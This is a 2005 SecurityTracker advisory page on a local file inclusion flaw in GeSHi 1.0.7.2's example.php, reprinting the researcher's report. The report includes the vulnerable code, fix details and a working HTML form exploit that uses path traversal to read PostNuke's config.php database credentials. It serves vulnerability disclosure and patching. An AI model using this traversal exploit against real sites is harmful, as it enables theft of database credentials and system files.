SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   GeSHi Vendors:   geshi.org
GeSHi Input Validation Hole Lets Remote Users Include Local Files
SecurityTracker Alert ID:  1014972
SecurityTracker URL:  http://securitytracker.com/id/1014972
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 27 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.0.7.2
Description:   Maksymilian Arciemowicz of SecurityReason.com reported a vulnerability in GeSHi. A remote user can include arbitrary local files.

The 'contrib/example.php' script does not properly validate user-supplied input in the 'language' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a local file on the target system. The PHP code, including operating system commands, will run with the privileges of the target web service. This can also be exploited to view files on the target system.

Impact:   A remote user can include and execute PHP code and operating system commands from local files on the target system or view certain files on the target system.
Solution:   The vendor has issued a fixed version (1.0.7.3), available at:

http://sourceforge.net/project/showfiles.php?group_id=114997

Vendor URL:  qbnz.com/highlighter/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  GeSHi Local PHP file inclusion 1.0.7.2

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[GeSHi Local PHP file inclusion 1.0.7.2]

Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
Date: 21.9.2005
from SECURITYREASON.COM

- --- 0.Description ---

GeSHi started as a mod for the phpBB forum system, to enable highlighting of 
more languages than the available (which was 0 ;)). However, it quickly 
spawned into an entire project on its own. But now it has been released, work 
continues on a mod for phpBB - and hopefully for many forum systems, blogs 
and other web-based systems.

Several systems are using GeSHi now, including:

PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool


- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
In file:

- -10-18-line---
include('../geshi.php');
if ( isset($_POST['submit']) )
{
	if ( get_magic_quotes_gpc() ) $_POST['source'] = 
stripslashes($_POST['source']);
	if ( !strlen(trim($_POST['source'])) )
	{
		$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . 
'.php'));
		$_POST['language'] = 'php';
	}
- -10-18-line---

Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can 
read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file. 
I have tested this bug in GeSHi package and in PostNuke 0.760.

PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)

We can read config.php in PostNuke where we have login, password, dbname and 
dbhost.
All variables needed to log in to database.
So we can just use this exploit below : 

- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
<center><a href="http://securityreason.com" 
target="http://securityreason.com/"><img 
src="http://securityreason.com/gfx/small_logo.png"></a><p>
<form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php" 
method="post">
Path to file:<br>
example: <b>../../../../config</b><br>
<textarea name="language"></textarea><br>
<input type="submit" name="submit" value="See">
</form>
- --- EXPLOIT FOR POSTNUKE 0.760 ---

[HOST] = example. http://www.securityreason.com/postnuke/html
any questions? ;]

- --- 2. How to fix ---
Patch
http://securityreason.com/patch/2
works in PostNuke 0.760

or new version of script 1.0.7.3

- --- 3. Greets ---

sp3x

- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDMuOr3Ke13X/fTO4RAtIPAJ9eYAoID8idUKarOBdV2ndLcy0VPgCgmvIm
MWVTap2Adcne2IMt7OpZHmM=
=JulS
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC